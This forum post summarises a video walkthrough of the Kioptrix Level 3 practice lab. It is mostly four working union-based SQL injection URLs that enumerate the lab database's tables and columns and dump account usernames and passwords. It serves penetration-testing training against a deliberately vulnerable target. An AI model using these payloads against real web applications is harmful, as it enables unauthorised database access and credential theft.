Jump to content
Praetorian503

Kioptrix Level 3 Sql-Injection

Recommended Posts

Posted



Description: In this video I will show you how to exploit Kioptrix Level 3 Web-Application using SQL-Injection.
Kioptrix is a vulnerable web Application for penetration testing.
In this demo I will cover how to exploit a web using sql-injection and finding Web admin password.

http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="dev_accounts"),4,5,6

http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password, 0x0A) from dev_accounts),4,5,6

http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype, 0x3A, firstname, 0x3A, lastname, 0x3A, email, 0x3A, website, 0x3A, issuperuser, 0x3A, joincode) from gallarific_users),4,5,6

Source : - Kioptrix Level 3 Notes *Spoiler Alert*

http://www.securitytube.net/video/6708

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...